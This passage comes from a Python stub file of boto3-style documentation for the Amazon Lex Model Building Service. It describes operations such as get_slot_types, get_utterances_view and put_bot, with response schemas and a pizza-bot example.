:type nextToken: string
:param nextToken: A pagination token for fetching the next page of slot type versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of slot type versions to return in the response. The default is 10.
:rtype: dict
Returns
Response Syntax
{
'slotTypes': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
slotTypes (list) --
An array of SlotTypeMetadata objects, one for each numbered version of the slot type plus one for the $LATEST version.
(dict) --
Provides information about a slot type.
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version of the slot type.
nextToken (string) --
A pagination token for fetching the next page of slot type versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'slotTypes': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_slot_types(nextToken=None, maxResults=None, nameContains=None):
"""
Returns slot type information as follows:
If you specify the nameContains field, returns the $LATEST version of all slot types that contain the specified string.
If you don't specify the nameContains field, returns information about the $LATEST version of all slot types.
The operation requires permission for the lex:GetSlotTypes action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get a list of all of the slot types in your account.
Expected Output:
:example: response = client.get_slot_types(
nextToken='string',
maxResults=123,
nameContains='string'
)
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of slot types. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of slot types, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of slot types to return in the response. The default is 10.
:type nameContains: string
:param nameContains: Substring to match in slot type names. A slot type will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:rtype: dict
Returns
Response Syntax
{
'slotTypes': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
slotTypes (list) --
An array of objects, one for each slot type, that provides information such as the name of the slot type, the version, and a description.
(dict) --
Provides information about a slot type.
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version of the slot type.
nextToken (string) --
If the response is truncated, it includes a pagination token that you can specify in your next request to fetch the next page of slot types.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get a list of all of the slot types in your account.
response = client.get_slot_types(
maxResults=10,
nextToken='',
)
print(response)
Expected Output:
{
'slotTypes': [
{
'version': '$LATEST',
'name': 'DocPizzaCrustType',
'createdDate': 1494359274.403,
'description': 'Available crust types',
'lastUpdatedDate': 1494359274.403,
},
{
'version': '$LATEST',
'name': 'DocPizzaSauceType',
'createdDate': 1494356442.23,
'description': 'Available pizza sauces',
'lastUpdatedDate': 1494356442.23,
},
{
'version': '$LATEST',
'name': 'DocPizzaType',
'createdDate': 1494359198.656,
'description': 'Available pizzas',
'lastUpdatedDate': 1494359198.656,
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'slotTypes': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
nextToken (string) -- A pagination token that fetches the next page of slot types. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of slot types, specify the pagination token in the next request.
maxResults (integer) -- The maximum number of slot types to return in the response. The default is 10.
nameContains (string) -- Substring to match in slot type names. A slot type will be returned if any part of its name matches the substring. For example, "xyz" matches both "xyzabc" and "abcxyz".
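Because a truncated response carries a nextToken, retrieving every slot type means looping until the token is absent. A minimal pagination sketch (iter_slot_types is an illustrative helper, not part of the API; client is assumed to be an already-configured LexModelBuildingService client):

```python
def iter_slot_types(client, page_size=10):
    # Yield every slot type summary, following nextToken pagination.
    kwargs = {'maxResults': page_size}
    while True:
        response = client.get_slot_types(**kwargs)
        for slot_type in response.get('slotTypes', []):
            yield slot_type
        token = response.get('nextToken')
        if not token:
            # No token means this was the last page.
            return
        # Echo the token back unchanged to fetch the next page.
        kwargs['nextToken'] = token
```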
"""
pass
def get_utterances_view(botName=None, botVersions=None, statusType=None):
"""
Use the GetUtterancesView operation to get information about the utterances that your users have made to your bot. You can use this list to tune the utterances that your bot responds to.
For example, say that you have created a bot to order flowers. After your users have used your bot for a while, use the GetUtterancesView operation to see the requests that they have made and whether they have been successful. You might find that the utterance "I want flowers" is not being recognized. You could add this utterance to the OrderFlowers intent so that your bot recognizes that utterance.
After you publish a new version of a bot, you can get information about the old version and the new so that you can compare the performance across the two versions.
Utterance statistics are generated once a day. Data is available for the last 15 days. You can request information for up to 5 versions of your bot in each request. Amazon Lex returns the most frequent utterances received by the bot in the last 15 days. The response contains information about a maximum of 100 utterances for each version.
If you set the childDirected field to true when you created your bot, or if you opted out of participating in improving Amazon Lex, utterances are not available.
This operation requires permissions for the lex:GetUtterancesView action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_utterances_view(
botName='string',
botVersions=[
'string',
],
statusType='Detected'|'Missed'
)
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot for which utterance information should be returned.\n
:type botVersions: list
:param botVersions: [REQUIRED]\nAn array of bot versions for which utterance information should be returned. The limit is 5 versions per request.\n\n(string) --\n\n
:type statusType: string
:param statusType: [REQUIRED]\nTo return utterances that were recognized and handled, use Detected . To return utterances that were not recognized, use Missed .\n
:rtype: dict
Returns
Response Syntax
{
'botName': 'string',
'utterances': [
{
'botVersion': 'string',
'utterances': [
{
'utteranceString': 'string',
'count': 123,
'distinctUsers': 123,
'firstUtteredDate': datetime(2015, 1, 1),
'lastUtteredDate': datetime(2015, 1, 1)
},
]
},
]
}
Response Structure
(dict) --
botName (string) --
The name of the bot for which utterance information was returned.
utterances (list) --
An array of UtteranceList objects, each containing a list of UtteranceData objects describing the utterances that were processed by your bot. The response contains a maximum of 100 UtteranceData objects for each version. Amazon Lex returns the most frequent utterances received by the bot in the last 15 days.
(dict) --
Provides a list of utterances that have been made to a specific version of your bot. The list contains a maximum of 100 utterances.
botVersion (string) --
The version of the bot that processed the list.
utterances (list) --
One or more UtteranceData objects that contain information about the utterances that have been made to a bot. The maximum number of objects is 100.
(dict) --
Provides information about a single utterance that was made to your bot.
utteranceString (string) --
The text that was entered by the user or the text representation of an audio clip.
count (integer) --
The number of times that the utterance was processed.
distinctUsers (integer) --
The total number of individuals that used the utterance.
firstUtteredDate (datetime) --
The date that the utterance was first recorded.
lastUtteredDate (datetime) --
The date that the utterance was last recorded.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'botName': 'string',
'utterances': [
{
'botVersion': 'string',
'utterances': [
{
'utteranceString': 'string',
'count': 123,
'distinctUsers': 123,
'firstUtteredDate': datetime(2015, 1, 1),
'lastUtteredDate': datetime(2015, 1, 1)
},
]
},
]
}
:returns:
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
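To tune a bot from this data, the nested per-version lists usually need flattening. A sketch that ranks the most frequent utterances across all returned versions (top_utterances is an illustrative helper, not part of the API):

```python
def top_utterances(view_response, limit=5):
    # Flatten a GetUtterancesView response across bot versions and return
    # the `limit` most frequent utterance strings with their counts.
    rows = []
    for version_list in view_response.get('utterances', []):
        for data in version_list.get('utterances', []):
            rows.append((data['utteranceString'], data['count']))
    # Most frequent first.
    rows.sort(key=lambda row: row[1], reverse=True)
    return rows[:limit]
```

Calling this with statusType='Missed' results highlights utterances worth adding to an intent.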
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def list_tags_for_resource(resourceArn=None):
"""
Gets a list of tags associated with the specified resource. Only bots, bot aliases, and bot channels can have tags associated with them.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
resourceArn='string'
)
:type resourceArn: string
:param resourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource to get a list of tags for.\n
:rtype: dict
Returns
Response Syntax
{
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
Response Structure
(dict) --
tags (list) --The tags associated with a resource.
(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.
key (string) --The key for the tag. Keys are not case-sensitive and must be unique.
value (string) --The value associated with a key. The value may be an empty string but it can\'t be null.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.LimitExceededException
:return: {
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
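The key/value list maps naturally onto a Python dict. A small illustrative helper (tags_as_dict is not part of the API):

```python
def tags_as_dict(response):
    # Convert the `tags` list from a ListTagsForResource response
    # into a plain {key: value} dict.
    return {tag['key']: tag['value'] for tag in response.get('tags', [])}
```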
"""
pass
def put_bot(name=None, description=None, intents=None, clarificationPrompt=None, abortStatement=None, idleSessionTTLInSeconds=None, voiceId=None, checksum=None, processBehavior=None, locale=None, childDirected=None, detectSentiment=None, createVersion=None, tags=None):
"""
Creates an Amazon Lex conversational bot or replaces an existing bot. When you create or update a bot, you are only required to specify a name, a locale, and whether the bot is directed toward children under age 13. You can use this to add intents later, or to remove intents from an existing bot. When you create a bot with the minimum information, the bot is created or updated, but Amazon Lex returns the response FAILED . You can build the bot after you add one or more intents. For more information about Amazon Lex bots, see how-it-works .
If you specify the name of an existing bot, the fields in the request replace the existing values in the $LATEST version of the bot. Amazon Lex removes any fields that you don\'t provide values for in the request, except for the idleTTLInSeconds and privacySettings fields, which are set to their default values. If you don\'t specify values for required fields, Amazon Lex throws an exception.
This operation requires permissions for the lex:PutBot action. For more information, see security-iam .
See also: AWS API Documentation
Exceptions
:example: response = client.put_bot(
name='string',
description='string',
intents=[
{
'intentName': 'string',
'intentVersion': 'string'
},
],
clarificationPrompt={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
abortStatement={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
idleSessionTTLInSeconds=123,
voiceId='string',
checksum='string',
processBehavior='SAVE'|'BUILD',
locale='en-US'|'en-GB'|'de-DE',
childDirected=True|False,
detectSentiment=True|False,
createVersion=True|False,
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot. The name is not case sensitive.\n
:type description: string
:param description: A description of the bot.
:type intents: list
:param intents: An array of Intent objects. Each intent represents a command that a user can express. For example, a pizza ordering bot might support an OrderPizza intent. For more information, see how-it-works .\n\n(dict) --Identifies the specific version of an intent.\n\nintentName (string) -- [REQUIRED]The name of the intent.\n\nintentVersion (string) -- [REQUIRED]The version of the intent.\n\n\n\n\n
:type clarificationPrompt: dict
:param clarificationPrompt: When Amazon Lex doesn\'t understand the user\'s intent, it uses this message to get clarification. To specify how many times Amazon Lex should repeat the clarification prompt, use the maxAttempts field. If Amazon Lex still doesn\'t understand, it sends the message in the abortStatement field.\nWhen you create a clarification prompt, make sure that it suggests the correct response from the user. for example, for a bot that orders pizza and drinks, you might create this clarification prompt: 'What would you like to do? You can say \'Order a pizza\' or \'Order a drink.\''\nIf you have defined a fallback intent, it will be invoked if the clarification prompt is repeated the number of times defined in the maxAttempts field. For more information, see AMAZON.FallbackIntent .\nIf you don\'t define a clarification prompt, at runtime Amazon Lex will return a 400 Bad Request exception in three cases:\n\nFollow-up prompt - When the user responds to a follow-up prompt but does not provide an intent. For example, in response to a follow-up prompt that says 'Would you like anything else today?' the user says 'Yes.' Amazon Lex will return a 400 Bad Request exception because it does not have a clarification prompt to send to the user to get an intent.\nLambda function - When using a Lambda function, you return an ElicitIntent dialog type. Since Amazon Lex does not have a clarification prompt to get an intent from the user, it returns a 400 Bad Request exception.\nPutSession operation - When using the PutSession operation, you send an ElicitIntent dialog type. Since Amazon Lex does not have a clarification prompt to get an intent from the user, it returns a 400 Bad Request exception.\n\n\nmessages (list) -- [REQUIRED]An array of objects, each of which provides a message string and its type. 
You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nmaxAttempts (integer) -- [REQUIRED]The number of times to prompt the user for information.\n\nresponseCard (string) --A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .\n\n\n
:type abortStatement: dict
:param abortStatement: When Amazon Lex can\'t understand the user\'s input in context, it tries to elicit the information a few times. After that, Amazon Lex sends the message defined in abortStatement to the user, and then aborts the conversation. To set the number of retries, use the valueElicitationPrompt field for the slot type.\nFor example, in a pizza ordering bot, Amazon Lex might ask a user 'What type of crust would you like?' If the user\'s response is not one of the expected responses (for example, 'thin crust, 'deep dish,' etc.), Amazon Lex tries to elicit a correct response a few more times.\nFor example, in a pizza ordering application, OrderPizza might be one of the intents. This intent might require the CrustType slot. You specify the valueElicitationPrompt field when you create the CrustType slot.\nIf you have defined a fallback intent the abort statement will not be sent to the user, the fallback intent is used instead. For more information, see AMAZON.FallbackIntent .\n\nmessages (list) -- [REQUIRED]A collection of message objects.\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nresponseCard (string) --At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.\n\n\n
:type idleSessionTTLInSeconds: integer
:param idleSessionTTLInSeconds: The maximum time in seconds that Amazon Lex retains the data gathered in a conversation.\nA user interaction session remains active for the amount of time specified. If no conversation occurs during this time, the session expires and Amazon Lex deletes any data provided before the timeout.\nFor example, suppose that a user chooses the OrderPizza intent, but gets sidetracked halfway through placing an order. If the user doesn\'t complete the order within the specified time, Amazon Lex discards the slot information that it gathered, and the user must start over.\nIf you don\'t include the idleSessionTTLInSeconds element in a PutBot operation request, Amazon Lex uses the default value. This is also true if the request replaces an existing bot.\nThe default is 300 seconds (5 minutes).\n
:type voiceId: string
:param voiceId: The Amazon Polly voice ID that you want Amazon Lex to use for voice interactions with the user. The locale configured for the voice must match the locale of the bot. For more information, see Voices in Amazon Polly in the Amazon Polly Developer Guide .
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version.\nWhen you create a new bot, leave the checksum field blank. If you specify a checksum you get a BadRequestException exception.\nWhen you want to update a bot, set the checksum field to the checksum of the most recent revision of the $LATEST version. If you don\'t specify the checksum field, or if the checksum does not match the $LATEST version, you get a PreconditionFailedException exception.\n
:type processBehavior: string
:param processBehavior: If you set the processBehavior element to BUILD , Amazon Lex builds the bot so that it can be run. If you set the element to SAVE Amazon Lex saves the bot, but doesn\'t build it.\nIf you don\'t specify this value, the default value is BUILD .\n
:type locale: string
:param locale: [REQUIRED]\nSpecifies the target locale for the bot. Any intent used in the bot must be compatible with the locale of the bot.\nThe default is en-US .\n
:type childDirected: boolean
:param childDirected: [REQUIRED]\nFor each Amazon Lex bot created with the Amazon Lex Model Building Service, you must specify whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to the Children\'s Online Privacy Protection Act (COPPA) by specifying true or false in the childDirected field. By specifying true in the childDirected field, you confirm that your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. By specifying false in the childDirected field, you confirm that your use of Amazon Lex is not related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. You may not specify a default value for the childDirected field that does not accurately reflect whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA.\nIf your use of Amazon Lex relates to a website, program, or other application that is directed in whole or in part, to children under age 13, you must obtain any required verifiable parental consent under COPPA. For information regarding the use of Amazon Lex in connection with websites, programs, or other applications that are directed or targeted, in whole or in part, to children under age 13, see the Amazon Lex FAQ.\n
:type detectSentiment: boolean
:param detectSentiment: When set to true, user utterances are sent to Amazon Comprehend for sentiment analysis. If you don\'t specify detectSentiment , the default is false .
:type createVersion: boolean
:param createVersion: When set to true, a new numbered version of the bot is created. This is the same as calling the CreateBotVersion operation. If you don\'t specify createVersion , the default is false .
:type tags: list
:param tags: A list of tags to add to the bot. You can only add tags when you create a bot, you can\'t use the PutBot operation to update the tags on a bot. To update tags, use the TagResource operation.\n\n(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.\n\nkey (string) -- [REQUIRED]The key for the tag. Keys are not case-sensitive and must be unique.\n\nvalue (string) -- [REQUIRED]The value associated with a key. The value may be an empty string but it can\'t be null.\n\n\n\n\n
:rtype: dict
Returns
Response Syntax
{
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'createVersion': True|False,
'detectSentiment': True|False,
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
Response Structure
(dict) --
name (string) --
The name of the bot.
description (string) --
A description of the bot.
intents (list) --
An array of Intent objects. For more information, see PutBot .
(dict) --
Identifies the specific version of an intent.
intentName (string) --
The name of the intent.
intentVersion (string) --
The version of the intent.
clarificationPrompt (dict) --
The prompts that Amazon Lex uses when it doesn\'t understand the user\'s intent. For more information, see PutBot .
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
abortStatement (dict) --
The message that Amazon Lex uses to abort a conversation. For more information, see PutBot .
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
status (string) --
When you send a request to create a bot with processBehavior set to BUILD , Amazon Lex sets the status response element to BUILDING .
In the READY_BASIC_TESTING state you can test the bot with user inputs that exactly match the utterances configured for the bot\'s intents and values in the slot types.
If Amazon Lex can\'t build the bot, Amazon Lex sets status to FAILED . Amazon Lex returns the reason for the failure in the failureReason response element.
When you set processBehavior to SAVE , Amazon Lex sets the status code to NOT_BUILT .
When the bot is in the READY state you can test and publish the bot.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to build the bot.
lastUpdatedDate (datetime) --
The date that the bot was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot was created.
idleSessionTTLInSeconds (integer) --
The maximum length of time that Amazon Lex retains the data gathered in a conversation. For more information, see PutBot .
voiceId (string) --
The Amazon Polly voice ID that Amazon Lex uses for voice interaction with the user. For more information, see PutBot .
checksum (string) --
Checksum of the bot that you created.
version (string) --
The version of the bot. For a new bot, the version is always $LATEST .
locale (string) --
The target locale for the bot.
childDirected (boolean) --
For each Amazon Lex bot created with the Amazon Lex Model Building Service, you must specify whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to the Children\'s Online Privacy Protection Act (COPPA) by specifying true or false in the childDirected field. By specifying true in the childDirected field, you confirm that your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. By specifying false in the childDirected field, you confirm that your use of Amazon Lex is not related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. You may not specify a default value for the childDirected field that does not accurately reflect whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA.
If your use of Amazon Lex relates to a website, program, or other application that is directed in whole or in part, to children under age 13, you must obtain any required verifiable parental consent under COPPA. For information regarding the use of Amazon Lex in connection with websites, programs, or other applications that are directed or targeted, in whole or in part, to children under age 13, see the Amazon Lex FAQ.
createVersion (boolean) --
True if a new version of the bot was created. If the createVersion field was not specified in the request, the createVersion field is set to false in the response.
detectSentiment (boolean) --
true if the bot is configured to send user utterances to Amazon Comprehend for sentiment analysis. If the detectSentiment field was not specified in the request, the detectSentiment field is false in the response.
tags (list) --
A list of tags associated with the bot.
(dict) --
A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.
key (string) --
The key for the tag. Keys are not case-sensitive and must be unique.
value (string) --
The value associated with a key. The value may be an empty string but it can\'t be null.
Exceptions
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
Examples
This example shows how to create a bot for ordering pizzas.
response = client.put_bot(
name='DocOrderPizzaBot',
abortStatement={
'messages': [
{
'content': "I don't understand. Can you try again?",
'contentType': 'PlainText',
},
{
'content': "I'm sorry, I don't understand.",
'contentType': 'PlainText',
},
],
},
childDirected=True,
clarificationPrompt={
'maxAttempts': 1,
'messages': [
{
'content': "I'm sorry, I didn't hear that. Can you repeat what you just said?",
'contentType': 'PlainText',
},
{
'content': 'Can you say that again?',
'contentType': 'PlainText',
},
],
},
description='Orders a pizza from a local pizzeria.',
idleSessionTTLInSeconds=300,
intents=[
{
'intentName': 'DocOrderPizza',
'intentVersion': '$LATEST',
},
],
locale='en-US',
processBehavior='SAVE',
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocOrderPizzaBot',
'abortStatement': {
'messages': [
{
'content': "I don't understand. Can you try again?",
'contentType': 'PlainText',
},
{
'content': "I'm sorry, I don't understand.",
'contentType': 'PlainText',
},
],
},
'checksum': '20172ee3-fa06-49b2-bbc5-667c090303e9',
'childDirected': True,
'clarificationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': "I'm sorry, I didn't hear that. Can you repeat what you just said?",
'contentType': 'PlainText',
},
{
'content': 'Can you say that again?',
'contentType': 'PlainText',
},
],
},
'createdDate': 1494360160.133,
'description': 'Orders a pizza from a local pizzeria.',
'idleSessionTTLInSeconds': 300,
'intents': [
{
'intentName': 'DocOrderPizza',
'intentVersion': '$LATEST',
},
],
'lastUpdatedDate': 1494360160.133,
'locale': 'en-US',
'status': 'NOT_BUILT',
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'createVersion': True|False,
'detectSentiment': True|False,
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
:returns:
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
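Because PutBot replaces any unspecified fields in the $LATEST version and uses the checksum for optimistic locking, updates are usually built from a prior GetBot or PutBot response. A sketch under those assumptions (build_put_bot_update is an illustrative helper, not part of the API; current_bot is assumed to be such a response dict):

```python
def build_put_bot_update(current_bot, **changes):
    # Build PutBot kwargs that update $LATEST safely: carry over required
    # fields so they are not reset, and include the current checksum so the
    # call fails with PreconditionFailedException if the bot changed
    # since it was read.
    request = {
        'name': current_bot['name'],
        'locale': current_bot['locale'],
        'childDirected': current_bot['childDirected'],
        'abortStatement': current_bot['abortStatement'],
        'idleSessionTTLInSeconds': current_bot['idleSessionTTLInSeconds'],
        'checksum': current_bot['checksum'],
    }
    # Apply the caller's edits last so they win over the carried-over values.
    request.update(changes)
    return request
```

The result would then be passed as client.put_bot(**request).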
"""
pass
def put_bot_alias(name=None, description=None, botVersion=None, botName=None, checksum=None, conversationLogs=None, tags=None):
"""
Creates an alias for the specified version of the bot or replaces an alias for the specified bot. To change the version of the bot that the alias points to, replace the alias. For more information about aliases, see versioning-aliases .
This operation requires permissions for the lex:PutBotAlias action.
See also: AWS API Documentation
Exceptions
:example: response = client.put_bot_alias(
name='string',
description='string',
botVersion='string',
botName='string',
checksum='string',
conversationLogs={
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string'
},
],
'iamRoleArn': 'string'
},
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
:type name: string
:param name: [REQUIRED]\nThe name of the alias. The name is not case sensitive.\n
:type description: string
:param description: A description of the alias.
:type botVersion: string
:param botVersion: [REQUIRED]\nThe version of the bot.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot.\n
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version.\nWhen you create a new bot alias, leave the checksum field blank. If you specify a checksum you get a BadRequestException exception.\nWhen you want to update a bot alias, set the checksum field to the checksum of the most recent revision of the $LATEST version. If you don\'t specify the checksum field, or if the checksum does not match the $LATEST version, you get a PreconditionFailedException exception.\n
:type conversationLogs: dict
